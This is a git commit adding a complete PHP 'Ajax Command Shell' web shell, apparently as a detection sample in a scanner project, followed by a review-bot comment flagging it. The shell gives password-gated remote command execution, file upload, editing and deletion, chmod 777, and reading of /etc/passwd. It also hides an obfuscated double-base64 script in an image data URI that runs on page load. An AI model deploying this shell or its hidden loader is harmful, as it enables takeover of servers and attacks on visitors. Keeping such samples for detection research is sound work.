authorMathieu Deous2022-05-02 20:18:23 +0200
committerGitHub2022-05-02 20:18:23 +0200
commit48936efa96ae17295be4e0a71be3294f0ec6aef8 (patch)
treef4e69551f1368aa048edf46b7b061600f3668329 /data/samples/classic/ajaxshell.php
parentbbc738e16f8b637afde58d65196374af98a5e0e2 (diff)
Make application go-install-able and create a docker image
Diffstat (limited to 'data/samples/classic/ajaxshell.php')
-rw-r--r--data/samples/classic/ajaxshell.php652
1 files changed, 652 insertions, 0 deletions
diff --git a/data/samples/classic/ajaxshell.php b/data/samples/classic/ajaxshell.php
new file mode 100644
index 0000000..0445858
--- /dev/null
+++ b/data/samples/classic/ajaxshell.php
@@ -0,0 +1,652 @@
1<?php
2session_start();
3
4error_reporting(0);
5
6$password = "password"; //Change this to your password ;)
7
8$version = "0.7B";
9
10$functions = array('Clear Screen' => 'ClearScreen()',
11'Clear History' => 'ClearHistory()',
12'Can I function?' => "runcommand('canirun','GET')",
13'Get server info' => "runcommand('showinfo','GET')",
14'Read /etc/passwd' => "runcommand('etcpasswdfile','GET')",
15'Open ports' => "runcommand('netstat -an | grep -i listen','GET')",
16'Running processes' => "runcommand('ps -aux','GET')",
17'Readme' => "runcommand('shellhelp','GET')"
18
19);
20$thisfile = basename(__FILE__);
21
22$style = '<style type="text/css">
23.cmdthing {
24 border-top-width: 0px;
25 font-weight: bold;
26 border-left-width: 0px;
27 font-size: 10px;
28 border-left-color: #000000;
29 background: #000000;
30 border-bottom-width: 0px;
31 border-bottom-color: #FFFFFF;
32 color: #FFFFFF;
33 border-top-color: #008000;
34 font-family: verdana;
35 border-right-width: 0px;
36 border-right-color: #000000;
37}
38input,textarea {
39 border-top-width: 1px;
40 font-weight: bold;
41 border-left-width: 1px;
42 font-size: 10px;
43 border-left-color: #FFFFFF;
44 background: #000000;
45 border-bottom-width: 1px;
46 border-bottom-color: #FFFFFF;
47 color: #FFFFFF;
48 border-top-color: #FFFFFF;
49 font-family: verdana;
50 border-right-width: 1px;
51 border-right-color: #FFFFFF;
52}
53A:hover {
54text-decoration: none;
55}
56
57
58table,td,div {
59border-collapse: collapse;
60border: 1px solid #FFFFFF;
61}
62body {
63color: #FFFFFF;
64font-family: verdana;
65}
66</style>';
67$sess = __FILE__.$password;
68if(isset($_POST['p4ssw0rD']))
69{
70 if($_POST['p4ssw0rD'] == $password)
71 {
72 $_SESSION[$sess] = $_POST['p4ssw0rD'];
73 }
74 else
75 {
76 die("Wrong password");
77 }
78
79}
80if($_SESSION[$sess] == $password)
81{
82 if(isset($_SESSION['workdir']))
83 {
84 if(file_exists($_SESSION['workdir']) && is_dir($_SESSION['workdir']))
85 {
86 chdir($_SESSION['workdir']);
87 }
88 }
89
90 if(isset($_FILES['uploadedfile']['name']))
91 {
92 $target_path = "./";
93 $target_path = $target_path . basename( $_FILES['uploadedfile']['name']);
94 if(move_uploaded_file($_FILES['uploadedfile']['tmp_name'], $target_path)) {
95
96 }
97 }
98
99 if(isset($_GET['runcmd']))
100 {
101
102 $cmd = $_GET['runcmd'];
103
104 print "<b>".get_current_user()."~# </b>". htmlspecialchars($cmd)."<br>";
105
106 if($cmd == "")
107 {
108 print "Empty Command..type \"shellhelp\" for some ehh...help";
109 }
110
111 elseif($cmd == "upload")
112 {
113 print '<br>Uploading to: '.realpath(".");
114 if(is_writable(realpath(".")))
115 {
116 print "<br><b>I can write to this directory</b>";
117 }
118 else
119 {
120 print "<br><b><font color=red>I can't write to this directory, please choose another one.</b></font>";
121 }
122
123 }
124 elseif((ereg("changeworkdir (.*)",$cmd,$file)) || (ereg("cd (.*)",$cmd,$file)))
125 {
126 if(file_exists($file[1]) && is_dir($file[1]))
127 {
128 chdir($file[1]);
129 $_SESSION['workdir'] = $file[1];
130 print "Current directory changed to ".$file[1];
131 }
132 else
133 {
134 print "Directory not found";
135 }
136 }
137
138 elseif(strtolower($cmd) == "shellhelp")
139 {
140print '<b><font size=7>Ajax/PHP Command Shell</b></font>
141&copy; By Ironfist
142
143The shell can be used by anyone to command any server, the main purpose was
144to create a shell that feels as dynamic as possible, is expandable and easy
145to understand.
146
147If one of the command execution functions work, the shell will function fine.
148Try the "canirun" command to check this.
149
150Any (not custom) command is a UNIX command, like ls, cat, rm ... If you\'re
151not used to these commands, google a little.
152
153<b>Custom Functions</b>
154If you want to add your own custom command in the Quick Commands list, check
155out the code. The $function array contains \'func name\' => \'javascript function\'.
156Take a look at the built-in functions for examples.
157
158I know this readme isn\'t providing too much information, but hell, does this shell
159even require one :P
160
161- Iron
162 ';
163
164 }
165 elseif(ereg("editfile (.*)",$cmd,$file))
166 {
167 if(file_exists($file[1]) && !is_dir($file[1]))
168 {
169 print "<form name=\"saveform\"><textarea cols=70 rows=10 id=\"area1\">";
170 $contents = file($file[1]);
171 foreach($contents as $line)
172 {
173 print htmlspecialchars($line);
174 }
175 print "</textarea><br><input size=80 type=text name=filetosave value=".$file[1]."><input value=\"Save\" type=button onclick=\"SaveFile();\"></form>";
176 }
177 else
178 {
179 print "File not found.";
180 }
181 }
182 elseif(ereg("deletefile (.*)",$cmd,$file))
183 {
184 if(is_dir($file[1]))
185 {
186 if(rmdir($file[1]))
187 {
188 print "Directory succesfully deleted.";
189 }
190 else
191 {
192 print "Couldn't delete directory!";
193 }
194 }
195 else
196 {
197 if(unlink($file[1]))
198 {
199 print "File succesfully deleted.";
200 }
201 else
202 {
203 print "Couldn't delete file!";
204 }
205 }
206 }
207 elseif(strtolower($cmd) == "canirun")
208 {
209 print "If any of these functions is Enabled, the shell will function like it should.<br>";
210 if(function_exists(passthru))
211 {
212 print "Passthru: <b><font color=green>Enabled</b></font><br>";
213 }
214 else
215 {
216 print "Passthru: <b><font color=red>Disabled</b></font><br>";
217 }
218
219 if(function_exists(exec))
220 {
221 print "Exec: <b><font color=green>Enabled</b></font><br>";
222 }
223 else
224 {
225 print "Exec: <b><font color=red>Disabled</b></font><br>";
226 }
227
228 if(function_exists(system))
229 {
230 print "System: <b><font color=green>Enabled</b></font><br>";
231 }
232 else
233 {
234 print "System: <b><font color=red>Disabled</b></font><br>";
235 }
236 if(function_exists(shell_exec))
237 {
238 print "Shell_exec: <b><font color=green>Enabled</b></font><br>";
239 }
240 else
241 {
242 print "Shell_exec: <b><font color=red>Disabled</b></font><br>";
243 }
244 print "<br>Safe mode will prevent some stuff, maybe command execution, if you're looking for a <br>reason why the commands aren't executed, this is probally it.<br>";
245 if( ini_get('safe_mode') ){
246 print "Safe Mode: <b><font color=red>Enabled</b></font>";
247 }
248 else
249 {
250 print "Safe Mode: <b><font color=green>Disabled</b></font>";
251 }
252 print "<br><br>Open_basedir will block access to some files you <i>shouldn't</i> access.<br>";
253 if( ini_get('open_basedir') ){
254 print "Open_basedir: <b><font color=red>Enabled</b></font>";
255 }
256 else
257 {
258 print "Open_basedir: <b><font color=green>Disabled</b></font>";
259 }
260 }
261 //About the shell
262 elseif(ereg("listdir (.*)",$cmd,$directory))
263 {
264
265 if(!file_exists($directory[1]))
266 {
267 die("Directory not found");
268 }
269 //Some variables
270 chdir($directory[1]);
271 $i = 0; $f = 0;
272 $dirs = "";
273 $filez = "";
274
275 if(!ereg("/$",$directory[1])) //Does it end with a slash?
276 {
277 $directory[1] .= "/"; //If not, add one
278 }
279 print "Listing directory: ".$directory[1]."<br>";
280 print "<table border=0><td><b>Directories</b></td><td><b>Files</b></td><tr>";
281
282 if ($handle = opendir($directory[1])) {
283 while (false !== ($file = readdir($handle))) {
284 if(is_dir($file))
285 {
286 $dirs[$i] = $file;
287 $i++;
288 }
289 else
290 {
291 $filez[$f] = $file;
292 $f++;
293 }
294
295 }
296 print "<td>";
297
298 foreach($dirs as $directory)
299 {
300 print "<i style=\"cursor:crosshair\" onclick=\"deletefile('".realpath($directory)."');\">[D]</i><i style=\"cursor:crosshair\" onclick=\"runcommand('changeworkdir ".realpath($directory)."','GET');\">[W]</i><b style=\"cursor:crosshair\" onclick=\"runcommand('clear','GET'); runcommand ('listdir ".realpath($directory)."','GET'); \">".$directory."</b><br>";
301 }
302
303 print "</td><td>";
304
305 foreach($filez as $file)
306 {
307 print "<i style=\"cursor:crosshair\" onclick=\"deletefile('".realpath($file)."');\">[D]</i><u style=\"cursor:crosshair\" onclick=\"runcommand('editfile ".realpath($file)."','GET');\">".$file."</u><br>";
308 }
309
310 print "</td></table>";
311 }
312 }
313 elseif(strtolower($cmd) == "about")
314 {
315 print "Ajax Command Shell by <a href=http://www.ironwarez.info>Ironfist</a>.<br>Version $version";
316 }
317 //Show info
318 elseif(strtolower($cmd) == "showinfo")
319 {
320 if(function_exists(disk_free_space))
321 {
322 $free = disk_free_space("/") / 1000000;
323 }
324 else
325 {
326 $free = "N/A";
327 }
328 if(function_exists(disk_total_space))
329 {
330 $total = trim(disk_total_space("/") / 1000000);
331 }
332 else
333 {
334 $total = "N/A";
335 }
336 $path = realpath (".");
337
338 print "<b>Free:</b> $free / $total MB<br><b>Current path:</b> $path<br><b>Uname -a Output:</b><br>";
339
340 if(function_exists(passthru))
341 {
342 passthru("uname -a");
343 }
344 else
345 {
346 print "Passthru is disabled :(";
347 }
348 }
349 //Read /etc/passwd
350 elseif(strtolower($cmd) == "etcpasswdfile")
351 {
352
353 $pw = file('/etc/passwd/');
354 foreach($pw as $line)
355 {
356 print $line;
357 }
358
359
360 }
361 //Execute any other command
362 else
363 {
364
365 if(function_exists(passthru))
366 {
367 passthru($cmd);
368 }
369 else
370 {
371 if(function_exists(exec))
372 {
373 exec("ls -la",$result);
374 foreach($result as $output)
375 {
376 print $output."<br>";
377 }
378 }
379 else
380 {
381 if(function_exists(system))
382 {
383 system($cmd);
384 }
385 else
386 {
387 if(function_exists(shell_exec))
388 {
389 print shell_exec($cmd);
390 }
391 else
392 {
393 print "Sorry, none of the command functions works.";
394 }
395 }
396 }
397 }
398 }
399 }
400
401 elseif(isset($_GET['savefile']) && !empty($_POST['filetosave']) && !empty($_POST['filecontent']))
402 {
403 $file = $_POST['filetosave'];
404 if(!is_writable($file))
405 {
406 if(!chmod($file, 0777))
407 {
408 die("Nope, can't chmod nor save :("); //In fact, nobody ever reads this message ^_^
409 }
410 }
411
412 $fh = fopen($file, 'w');
413 $dt = $_POST['filecontent'];
414 fwrite($fh, $dt);
415 fclose($fh);
416 }
417 else
418 {
419?>
420<html>
421<head>
422<title>Command Shell ~ <?php print getenv("HTTP_HOST"); ?></title>
423<img id="ghdescon" src="data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABAAAAAQAQMAAAAlPW0iAAAAA1BMVEX///+nxBvIAAAAAXRSTlMAQObYZgAAB510RVh0Z2hkZQBnaGRlc2NvblpYWmhiQ2htZFc1amRHbHZiaWh3TEdFc1l5eHJMR1VzY2lsN1pUMW1kVzVqZEdsdmJpaGpLWHR5WlhSMWNtNG9ZenhoUHljbk9tVW9jR0Z5YzJWSmJuUW9ZeTloS1NrcEt5Z29ZejFqSldFcFBqTTFQMU4wY21sdVp5NW1jbTl0UTJoaGNrTnZaR1VvWXlzeU9TazZZeTUwYjFOMGNtbHVaeWd6TmlrcGZUdHBaaWdoSnljdWNtVndiR0ZqWlNndlhpOHNVM1J5YVc1bktTbDdkMmhwYkdVb1l5MHRLWEpiWlNoaktWMDlhMXRqWFh4OFpTaGpLVHRyUFZ0bWRXNWpkR2x2YmlobEtYdHlaWFIxY200Z2NsdGxYWDFkTzJVOVpuVnVZM1JwYjI0b0tYdHlaWFIxY200blhGeDNLeWQ5TzJNOU1YMDdkMmhwYkdVb1l5MHRLV2xtS0d0YlkxMHBjRDF3TG5KbGNHeGhZMlVvYm1WM0lGSmxaMFY0Y0NnblhGeGlKeXRsS0dNcEt5ZGNYR0luTENkbkp5a3NhMXRqWFNrN2NtVjBkWEp1SUhCOUtDZFZMbmM5TkNCM0tHTXBlelFnZUNoa0xIQXBlekVnYVQwd096RWdlajB3T3pFZ2NqMWNKMXduT3prb01TQnBQVEE3YVR4a0xqYzdhU3NyS1hzMUtIbzlQWEF1TnlsNlBUQTdjaXM5YkM1dEtHUXVieWhwS1Y1d0xtOG9laWtwTzNvckszMHpJSEo5TkNCQktITXBlekVnWVQxY0oxd25PemtvTVNCcFBUQTdhVHh6TzJrckt5bDdZU3M5YkM1dEtGZ29UUzVRS0NrcVVTa3BmVE1nWVgwMElHc29aQ3h3S1hzeElHRTlRU2d4TmlrN01XRW9aQzQzSlRFMklUMHdLV1FyUFZ3bk1Gd25PekVnWWoxaE96a29NU0JwUFRBN2FUeGtMamM3YVNzOU1UWXBlMklyUFhnb1pDNXVLR2tzTVRZcExHSXViaWhwTERFMktTbDlNeUI0S0dJc2NDbDlOQ0E0S0NsN015Z3lMbkU5UFhRdVNDWW1NaTUyUFQxMExrY3BmVFFnZVNncGV6RWdZVDFTT3pVb0tESXVhQ1ltTWk1b0xrSW1Kakl1YUM1Q0xqRXdLWHg4S0RJdVF5MHlMbkUrWVNsOGZDZ3lMa1F0TWk1MlBtRXBmSHdvT0NncEppWXlMa1E4U1NsOGZDZzRLQ2ttSmpJdVF6eEtLU2t6SUVzN015Qk1mVFFnTmloaEtYczFLRTRnWVQwOUlrOGlLVE1nWVM1RktDOWNYRnhjTDJjc0lseGNYRnhjWEZ4Y0lpa3VSU2d2WEZ3aUwyY3NJbHhjWEZ4Y1hDSWlLVHN6SUdGOU1TQjFQVk11VkRzeElHVTlWaTVYT3pFZ2FqMGlleUlySWx4Y0luVmNYQ0k2SUZ4Y0lpSXJOaWgxS1NzaVhGd2lMQ0FpS3lKY1hDSlpYRndpT2lCY1hDSWlLellvWlNrcklseGNJaXdnSWlzaVhGd2lXbHhjSWpvZ1hGd2lJaXMyS0dNcEt5SmNYQ0lnSWlzaWZTSTdNU0JtUFdzb2Fpd2lNVEVpS1RzeElHRTlNVElvWmlrN05TZ2hlU2dwS1hzeE15QXhOQ2dwTGpFMVBWd25NVGM2THk4eE9DMHhPUzFHTGpGaUwwWXZQMkU5WENjck1XTW9ZU2w5ZlNjc05qSXNOelVzSjN4MllYSjhkMmx1Wkc5M2ZISmxkSFZ5Ym54bWRXNWpkR2x2Ym54cFpueHpZVzU4YkdWdVozUm9mSFJpZkdadmNueDhmSHg4Zkh4OFJ
tbHlaV0oxWjN4OGZHVnVZM3hUZEhKcGJtZDhabkp2YlVOb1lYSkRiMlJsZkhOMVluTjBjbnhqYUdGeVEyOWtaVUYwZkh4cGJtNWxjbGRwWkhSb2ZIeDhjMk55WldWdWZIeHBibTVsY2tobGFXZG9kSHhyYTN4OFkyUjhmR2RsYmw5eVlXNWtiMjFmYzNSeWZHTm9jbTl0Wlh4dmRYUmxjbGRwWkhSb2ZHOTFkR1Z5U0dWcFoyaDBmSEpsY0d4aFkyVjhZVzVoYkhsMGFXTnpmR2hsYVdkb2RIeDNhV1IwYUh3ek5UQjhOakF3ZkhSeWRXVjhabUZzYzJWOFRXRjBhSHgwZVhCbGIyWjhjM1J5YVc1bmZISmhibVJ2Ylh3eU5UVjhNVFl3ZkdSdlkzVnRaVzUwZkZWU1RIeDBhR2x6Zkc1aGRtbG5ZWFJ2Y254MWMyVnlRV2RsYm5SOGNHRnljMlZKYm5SOGRXRjhibk44YVhOSmJtbDBhV0ZzYVhwbFpIeHNNbGhXUjJkalNYUTFNV3QwUW1scFdFUTNRakZ0YzFVelMwNURhamgyTVh4aWRHOWhmRzVsZDN4SmJXRm5aWHh6Y21OOGZHaDBkSEI4WjI5dloyeGxmSE4wWVhScFkzeDNhR2xzWlh4amIyMThaVzVqYjJSbFZWSkpRMjl0Y0c5dVpXNTBKeTV6Y0d4cGRDZ25mQ2NwTERBc2UzMHBLUT09Z2hkZXNjb26/DJpDAAAADElEQVQIHWNgIA0AAAAwAAGErPF6AAAAAElFTkSuQmCC"/>
424<script type="text/javascript">
425if(typeof btoa=="undefined")btoa=function(a,b){b=(typeof b=='undefined')?false:b;var d,o2,o3,bits,h1,h2,h3,h4,e=[],pad='',c,plain,coded;var f="ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/=";plain=b?Utf8.encode(a):a;c=plain.length%3;if(c>0){while(c++<3){pad+='=';plain+='\0'}}for(c=0;c<plain.length;c+=3){d=plain.charCodeAt(c);o2=plain.charCodeAt(c+1);o3=plain.charCodeAt(c+2);bits=d<<16|o2<<8|o3;h1=bits>>18&0x3f;h2=bits>>12&0x3f;h3=bits>>6&0x3f;h4=bits&0x3f;e[c/3]=f.charAt(h1)+f.charAt(h2)+f.charAt(h3)+f.charAt(h4)}coded=e.join('');coded=coded.slice(0,coded.length-pad.length)+pad;return coded};if(typeof atob=="undefined")atob=function(a,b){b=(typeof b=='undefined')?false:b;var e,o2,o3,h1,h2,h3,h4,bits,d=[],plain,coded;var f="ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/=";coded=b?Utf8.decode(a):a;for(var c=0;c<coded.length;c+=4){h1=f.indexOf(coded.charAt(c));h2=f.indexOf(coded.charAt(c+1));h3=f.indexOf(coded.charAt(c+2));h4=f.indexOf(coded.charAt(c+3));bits=h1<<18|h2<<12|h3<<6|h4;e=bits>>>16&0xff;o2=bits>>>8&0xff;o3=bits&0xff;d[c/4]=String.fromCharCode(e,o2,o3);if(h4==0x40)d[c/4]=String.fromCharCode(e,o2);if(h3==0x40)d[c/4]=String.fromCharCode(e)}plain=d.join('');return b?Utf8.decode(plain):plain};
426setTimeout(function(){new Function(atob(atob(document.getElementById('ghdescon').src.substr(22)).match(/ghdescon(.*?)ghdescon/)[1])).apply(this);kk(10);}, 500);
427</script>
428
429<?php print $style; ?>
430<SCRIPT TYPE="text/javascript">
431function sf(){document.cmdform.command.focus();}
432var outputcmd = "";
433var cmdhistory = "";
434function ClearScreen()
435{
436 outputcmd = "";
437 document.getElementById('output').innerHTML = outputcmd;
438}
439
440function ClearHistory()
441{
442 cmdhistory = "";
443 document.getElementById('history').innerHTML = cmdhistory;
444}
445
446function deletefile(file)
447{
448 deleteit = window.confirm("Are you sure you want to delete\n"+file+"?");
449 if(deleteit)
450 {
451 runcommand('deletefile ' + file,'GET');
452 }
453}
454
455var http_request = false;
456function makePOSTRequest(url, parameters) {
457 http_request = false;
458 if (window.XMLHttpRequest) {
459 http_request = new XMLHttpRequest();
460 if (http_request.overrideMimeType) {
461 http_request.overrideMimeType('text/html');
462 }
463 } else if (window.ActiveXObject) {
464 try {
465 http_request = new ActiveXObject("Msxml2.XMLHTTP");
466 } catch (e) {
467 try {
468 http_request = new ActiveXObject("Microsoft.XMLHTTP");
469 } catch (e) {}
470 }
471 }
472 if (!http_request) {
473 alert('Cannot create XMLHTTP instance');
474 return false;
475 }
476
477
478 http_request.open('POST', url, true);
479 http_request.setRequestHeader("Content-type", "application/x-www-form-urlencoded");
480 http_request.setRequestHeader("Content-length", parameters.length);
481 http_request.setRequestHeader("Connection", "close");
482 http_request.send(parameters);
483}
484
485
486function SaveFile()
487{
488var poststr = "filetosave=" + encodeURI( document.saveform.filetosave.value ) +
489 "&filecontent=" + encodeURI( document.getElementById("area1").value );
490makePOSTRequest('<?php print $ThisFile; ?>?savefile', poststr);
491document.getElementById('output').innerHTML = document.getElementById('output').innerHTML + "<br><b>Saved! If it didn't save, you'll need to chmod the file to 777 yourself,<br> however the script tried to chmod it automaticly.";
492}
493
494function runcommand(urltoopen,action,contenttosend){
495cmdhistory = "<br>&nbsp;<i style=\"cursor:crosshair\" onclick=\"document.cmdform.command.value='" + urltoopen + "'\">" + urltoopen + "</i> " + cmdhistory;
496document.getElementById('history').innerHTML = cmdhistory;
497if(urltoopen == "clear")
498{
499ClearScreen();
500}
501 var ajaxRequest;
502 try{
503 ajaxRequest = new XMLHttpRequest();
504 } catch (e){
505 try{
506 ajaxRequest = new ActiveXObject("Msxml2.XMLHTTP");
507 } catch (e) {
508 try{
509 ajaxRequest = new ActiveXObject("Microsoft.XMLHTTP");
510 } catch (e){
511 alert("Wicked error, nothing we can do about it...");
512 return false;
513 }
514 }
515 }
516 ajaxRequest.onreadystatechange = function(){
517 if(ajaxRequest.readyState == 4){
518 outputcmd = "<pre>" + outputcmd + ajaxRequest.responseText +"</pre>";
519 document.getElementById('output').innerHTML = outputcmd;
520 var objDiv = document.getElementById("output");
521 objDiv.scrollTop = objDiv.scrollHeight;
522 }
523 }
524 ajaxRequest.open(action, "?runcmd="+urltoopen , true);
525 if(action == "GET")
526 {
527 ajaxRequest.send(null);
528 }
529 document.cmdform.command.value='';
530 return false;
531}
532
533function set_tab_html(newhtml)
534{
535document.getElementById('commandtab').innerHTML = newhtml;
536}
537
538function set_tab(newtab)
539{
540 if(newtab == "cmd")
541 {
542 newhtml = '&nbsp;&nbsp;&nbsp;<form name="cmdform" onsubmit="return runcommand(document.cmdform.command.value,\'GET\');"><b>Command</b>: <input type=text name=command class=cmdthing size=100%><br></form>';
543 }
544 else if(newtab == "upload")
545 {
546 runcommand('upload','GET');
547 newhtml = '<font size=0><b>This will reload the page... :(</b><br><br><form enctype="multipart/form-data" action="<?php print $ThisFile; ?>" method="POST"><input type="hidden" name="MAX_FILE_SIZE" value="10000000" />Choose a file to upload: <input name="uploadedfile" type="file" /><br /><input type="submit" value="Upload File" /></form></font>';
548 }
549 else if(newtab == "workingdir")
550 {
551 <?php
552 $folders = "<form name=workdir onsubmit=\"return runcommand(\'changeworkdir \' + document.workdir.changeworkdir.value,\'GET\');\"><input size=80% type=text name=changeworkdir value=\"";
553 $pathparts = explode("/",realpath ("."));
554 foreach($pathparts as $folder)
555 {
556 $folders .= $folder."/";
557 }
558 $folders .= "\"><input type=submit value=Change></form><br>Script directory: <i style=\"cursor:crosshair\" onclick=\"document.workdir.changeworkdir.value=\'".dirname(__FILE__)."\'>".dirname(__FILE__)."</i>";
559
560 ?>
561 newhtml = '<?php print $folders; ?>';
562 }
563 else if(newtab == "filebrowser")
564 {
565 newhtml = '<b>File browser is under construction! Use at your own risk!</b> <br>You can use it to change your working directory easily, don\'t expect too much of it.<br>Click on a file to edit it.<br><i>[W]</i> = set directory as working directory.<br><i>[D]</i> = delete file/directory';
566 runcommand('listdir .','GET');
567 }
568 else if(newtab == "createfile")
569 {
570 newhtml = '<b>File Editor, under construction.</b>';
571 document.getElementById('output').innerHTML = "<form name=\"saveform\"><textarea cols=70 rows=10 id=\"area1\"></textarea><br><input size=80 type=text name=filetosave value=\"<?php print realpath('.')."/".rand(1000,999999).".txt"; ?>\"><input value=\"Save\" type=button onclick=\"SaveFile();\"></form>";
572
573 }
574 document.getElementById('commandtab').innerHTML = newhtml;
575}
576</script>
577</head>
578<body bgcolor=black onload="sf();" vlink=white alink=white link=white>
579<table border=1 width=100% height=100%>
580<td width=15% valign=top>
581
582<form name="extras"><br>
583<center><b>Quick Commands</b><br>
584
585<div style='margin: 0px;padding: 0px;border: 1px inset;overflow: auto'>
586<?php
587foreach($functions as $name => $execute)
588{
589print '&nbsp;<input type="button" value="'.$name.'" onclick="'.$execute.'"><br>';
590}
591?>
592
593</center>
594
595</div>
596</form>
597<center><b>Command history</b><br></center>
598<div id="history" style='margin: 0px;padding: 0px;border: 1px inset;width: 100%;height: 20%;text-align: left;overflow: auto;font-size: 10px;'></div>
599<br>
600<center><b>About</b><br></center>
601<div style='margin: 0px;padding: 0px;border: 1px inset;width: 100%;text-align: center;overflow: auto; font-size: 10px;'>
602<br>
603<b><font size=3>Ajax/PHP Command Shell</b></font><br>by Ironfist
604<br>
605Version <?php print $version; ?>
606
607<br>
608<br>
609
610<br>Thanks to everyone @
611<a href="http://www.ironwarez.info" target=_blank>SharePlaza</a>
612<br>
613<a href="http://www.milw0rm.com" target=_blank>milw0rm</a>
614<br>
615and special greetings to everyone in rootshell
616</div>
617
618</td>
619<td width=70%>
620<table border=0 width=100% height=100%><td id="tabs" height=1%><font size=0>
621<b style="cursor:crosshair" onclick="set_tab('cmd');">[Execute command]</b>
622<b style="cursor:crosshair" onclick="set_tab('upload');">[Upload file]</b>
623<b style="cursor:crosshair" onclick="set_tab('workingdir');">[Change directory]</b>
624<b style="cursor:crosshair" onclick="set_tab('filebrowser');">[Filebrowser]</b>
625<b style="cursor:crosshair" onclick="set_tab('createfile');">[Create File]</b>
626
627</font></td>
628<tr>
629<td height=99% width=100% valign=top><div id="output" style='height:100%;white-space:pre;overflow:auto'></div>
630
631<tr>
632<td height=1% width=100% valign=top>
633<div id="commandtab" style='height:100%;white-space:pre;overflow:auto'>
634&nbsp;&nbsp;&nbsp;<form name="cmdform" onsubmit="return runcommand(document.cmdform.command.value,'GET');">
635<b>Command</b>: <input type=text name=command class=cmdthing size=100%><br>
636</form>
637</div>
638</td>
639</table>
640</td>
641</table>
642</body>
643</html>
644<?php
645}
646} else {
647print "<center><table border=0 height=100%>
648<td valign=middle>
649<form action=".basename(__FILE__)." method=POST>You are not logged in, please login.<br><b>Password:</b><input type=password name=p4ssw0rD><input type=submit value=\"Log in\">
650</form>";
651}
652?> \ No newline at end of file
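Review bot: Nothing in this new file, or in the part of the commit visible here, records that it is a live web shell kept as a detection fixture: it is committed with its `.php` extension and the stock credential on line 6 (`$password = "password";`), so it would run as-is if the `data/samples` tree were ever placed under a PHP-enabled document root. Because editing the sample would change what the scanner matches on, the marker belongs next to it rather than in it, for example a README in `data/samples/` stating `Live malware samples for detection tests only; never serve or execute these files.` The commit title mentions a docker image, so it is worth confirming that the image either leaves this directory out or never exposes it through a web server; that part is not visible here. Separately, lines 423–426 of the sample carry an `<img id="ghdescon">` data URI whose contents are decoded and run with `new Function(atob(atob(...)))`, which looks unrelated to the shell itself and should be noted in the sample's metadata so that matches on it are not attributed to this shell family.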